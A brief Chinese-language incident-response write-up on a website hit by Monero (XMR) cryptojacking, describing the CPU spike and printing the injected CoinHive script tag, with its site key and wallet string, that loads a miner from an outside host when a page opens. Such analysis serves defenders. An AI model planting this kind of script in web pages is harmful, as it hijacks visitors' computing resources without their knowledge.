Web應急：門羅幣惡意挖礦

門羅幣(Monero 或 XMR)，它是一個很是注重於隱私、匿名性和不可跟蹤的加密數字貨幣。只需在網頁中配置好js腳本，打開網頁就能夠挖礦，是一種很是簡單的挖礦方式，而經過這種惡意挖礦獲取數字貨幣是黑灰色產業獲取收益的重要途徑。

現象描述

利用XMR惡意挖礦，會大量佔用用戶的CPU資源，嚴重影響了網站的用戶體驗。

從08/09日0點開始，局域網內某IP訪問網站頁面會觸發安全預警，只要訪問此服務器上的網頁，CPU直線上升100%

問題解析

經過獲取惡意網頁url，對網頁頁面進行分析，發現網站頁面被植入在線門羅幣挖礦代碼：

<script> var script = document.createElement('script'); script.onload = function () { // XMR Pool hash var m = new CoinHive.Anonymous('BUSbODwUSryGnrIwy3o6Fhz1wsdz3ZNu'); // TODO: Replace the below string with wallet string m.start('47DuVLx9UuD1gEk3M4Wge1BwQyadQs5fTew8Q3Cxi95c8W7tKTXykgDfj7HVr9aCzzUNb9vA6eZ3eJCXE9yzhmTn1bjACGK'); }; script.src = 'https://coinhive.com/lib/coinhive.min.js'; document.head.appendChild(script); </script>

刪除js裏面的惡意代碼，網站被XMR 惡意挖礦，服務器已經被攻擊，進一步作服務器入侵排查。